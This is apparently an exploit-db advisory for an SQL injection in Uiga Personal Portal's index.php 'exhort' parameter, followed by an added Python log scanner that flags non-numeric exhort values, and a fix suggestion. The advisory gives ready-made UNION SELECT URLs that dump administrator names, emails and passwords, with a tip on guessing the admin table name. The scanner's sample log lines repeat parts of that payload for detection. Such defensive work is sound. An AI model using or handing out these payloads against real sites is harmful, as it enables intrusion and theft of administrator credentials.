Uiga Personal Portal – ‘index.php’ ‘view’ SQL Injection

  • Author: 41.w4r10r
    Date: 2010-04-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12399/
  • # Exploit Title: Uiga Personal Portal index.php (view) SQL Injection Vulnerability
    # Date: 27-4-2010
    # Author: 41.w4r10r
    # Software Link : http://www.scriptdevelopers.net/download/uigapersonalportal.zip
    # Version: Web Application
    # Tested on: Apache/Unix
    # CVE : [if exists]
    # Dork :
    # Code :
    
    
    
    Exploited Link :
    
    http://[site]/uigaportal/index.php?view=ar_det&exhort=-36'
    
    Examples :
    
    http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--
    
    http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_email,0x3a,admin_password),8,9,10,11+from+tbl_admin--
    
    Important: Sometimes the table name is administrators and sometimes it's admin
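
A log check for this issue from the defender's side, as an added example that is not part of the original advisory: it flags requests to `index.php` with `view=ar_det` whose `exhort` value is not a plain integer. The combined access-log format, the sample lines, the function names and the assumption that legitimate ids are plain digits are all assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate exhort value is a short run of digits.
PLAIN_ID_RE = re.compile(r"\d{1,10}")

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Apr/2010:10:00:01 +0000] "GET /uigaportal/index.php?view=ar_det&exhort=36 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Apr/2010:10:00:07 +0000] "GET /uigaportal/index.php?view=ar_det&exhort=-36%27 HTTP/1.1" 200 312',
    '203.0.113.9 - - [27/Apr/2010:10:00:09 +0000] "GET /uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3 HTTP/1.1" 200 640',
    '203.0.113.5 - - [27/Apr/2010:10:00:12 +0000] "GET /uigaportal/index.php?view=home HTTP/1.1" 200 4096',
]


def suspicious_exhort(line):
    """Return the decoded exhort value if it is not a plain integer, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/index.php"):
        return None
    # parse_qs percent-decodes and turns '+' into a space, so encoded
    # payloads are compared in their decoded form.
    params = parse_qs(url.query, keep_blank_values=True)
    if "ar_det" not in params.get("view", []):
        return None
    for value in params.get("exhort", []):
        if not PLAIN_ID_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_exhort(line)
        if value is not None:
            hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric exhort value {value!r}")
```

The same digits-only rule is the natural server-side fix: reject or integer-cast `exhort` before it reaches the query, and bind it as a parameter.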